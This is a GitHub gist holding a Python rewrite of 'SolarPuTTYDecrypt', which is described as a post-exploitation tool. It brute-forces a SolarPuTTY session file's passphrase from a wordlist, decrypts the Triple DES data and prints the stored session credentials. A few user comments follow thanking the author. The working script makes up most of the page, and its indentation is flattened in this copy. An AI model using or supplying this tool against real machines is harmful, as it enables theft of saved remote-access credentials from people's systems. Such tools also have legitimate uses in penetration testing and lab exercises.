Skip to content

Instantly share code, notes, and snippets.

@xHacka
Last active November 9, 2024 23:03
Show Gist options
  • Save xHacka/052e4b09d893398b04bf8aff5872d0d5 to your computer and use it in GitHub Desktop.
Save xHacka/052e4b09d893398b04bf8aff5872d0d5 to your computer and use it in GitHub Desktop.
SolarPuTTYDecrypt: A post-exploitation tool to decrypt SolarPutty's sessions files, rewritten in Python. Original Author: Paolo Stagno (@Void_Sec - voidsec.com)
import base64
import sys
from Crypto.Cipher import DES3
from Crypto.Protocol.KDF import PBKDF2
def decrypt(passphrase, ciphertext):
data = ''
try:
# Decode the base64 encoded ciphertext
array = base64.b64decode(ciphertext)
salt = array[:24]
iv = array[24:32]
encrypted_data = array[48:]
# Derive the key using PBKDF2
key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
# Create the Triple DES cipher in CBC mode
cipher = DES3.new(key, DES3.MODE_CBC, iv)
# Decrypt the data
decrypted_data = cipher.decrypt(encrypted_data)
# Remove padding (PKCS7 padding)
padding_len = decrypted_data[-1]
decrypted_data = decrypted_data[:-padding_len]
data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
except Exception as e:
print(f'Error: {e}')
return data
if len(sys.argv) < 3:
print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
exit(1)
with open(sys.argv[1]) as f:
cipher = f.read()
with open(sys.argv[2]) as passwords:
for i, password in enumerate(passwords):
password = password.strip()
decrypted = decrypt(password, cipher)
print(f'[{i}] {password=}', end='\r')
if 'Credentials' in decrypted:
print(f'\r[{i}] {password=} {" " * 10}')
print()
print(decrypted)
break
@xHacka
Copy link
Author

xHacka commented Oct 12, 2024

More info:

Original Author: Paolo Stagno (@Void_Sec - voidsec.com)

@xHacka
Copy link
Author

xHacka commented Oct 13, 2024

Tested with:

➜ pip freeze | sls crypto

cryptography==41.0.5
pycryptodome==3.21.0

@datboi6942
Copy link

oh thank god, i was banging my head against the wall trying to use dotnet

@CyberDiogenex
Copy link

Thank the lord

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment